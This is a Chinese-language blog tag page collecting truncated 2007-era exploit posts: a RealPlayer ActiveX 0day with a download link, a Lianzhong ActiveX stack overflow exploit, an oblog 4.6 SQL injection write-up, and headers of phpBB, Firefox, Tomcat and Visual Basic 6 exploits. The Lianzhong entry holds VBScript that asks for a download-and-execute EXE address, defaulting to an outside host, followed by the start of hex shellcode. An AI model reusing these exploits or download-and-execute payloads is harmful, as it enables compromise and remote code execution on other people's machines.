标签 ‘Exploit’ 下的日志

Realplay ActiveX 0day 利用工具

来源:酒水不犯茶水

好像10.5以下版本都中,这个似乎只能溢出一次,第一次溢出成功后,第二次开始会有realplay修复数据库的提示,点修复就中,取消不中

上次测试使用的"Windows 按钮突破专家" 4.5K 溢出没问题,但是"iecv.exe"那个87K
溢出的时候老是看不到界面,其实已经执行(进程中可以看到),不知道为什么(不知道是否大小问题)

另:IE5不中,代码中直接跳过了

http://www.blogjava.net/Files/baicker/realplay_071122_exp.rar

Tags: , ,

联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)

鬼仔注:又见联众

来源:vbs空间

exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
code="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x8b\xd8\x8b\x73\x3c\x8b\x74\x1e\x78\x03\xf3\x8 阅读全文 »

Tags: , , ,

[vbs也写EXP]xunlei_0day_exp

来源:vbs空间

阅读全文 »

Tags: , ,

惊爆oblog4.6 0day

此文章已发表在《黑客X档案》第11期杂志上
如需转载,请务必保留此信息!

作者:zj1244&竹子

自从上次oblog的tb.asp和js.asp文件出现漏洞后,直至今日oblog都没有爆出什么安全问题,前些日子官方发布了4.6稳定版,趁着无聊下下来看看代码的安全性,没想到还真的发现了一些问题。后来联系了oblog的客服,可是在qq上验证了几次人家也没有理我,没办法,那就只能发出来了。

我们先来简单分析一下漏洞的成因:漏洞出现在user_diggs.asp文件第304行左右,用Request获得topic的值,然后用oblog.InterceptStr处理后赋给topic。oblog.InterceptStr的作用只是截断字符而已,并没有过滤特殊字符。接着往 阅读全文 »

Tags: , ,

phpBB Links MOD Remote Blind SQL Injection Exploit

来源:7jdg's blog

阅读全文 »

Tags: , , ,

Mozilla Firefox < = 2.0.0.7 Remote Denial of Service Exploit

i######################### WwW.BugReport.ir #########################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service
# Vendor URL: www.mozilla.org
# Version: <= 2.0.0.7
# Fix Available: Yes!
# Soloution: Update to 2.0.0.8
# Note: This bug works on 2.0.0.8 in different 阅读全文 »

Tags: ,

Apache Tomcat Remote File Disclosure Zeroday Xploit

来源:milw0rm.com

阅读全文 »

Tags: , ,

Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit

来源:milw0rm

#!/usr/bin/perl
#' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++
#' ++++++++++++++++++++++++++++++++++++++++++++++++++++++
#'++ Author: Koshi +
#'++ Email: heykoshi at gmail dot com +
#'++ Application: Microsoft Visual Basic 6.0 +
#'++ 阅读全文 »

Tags: ,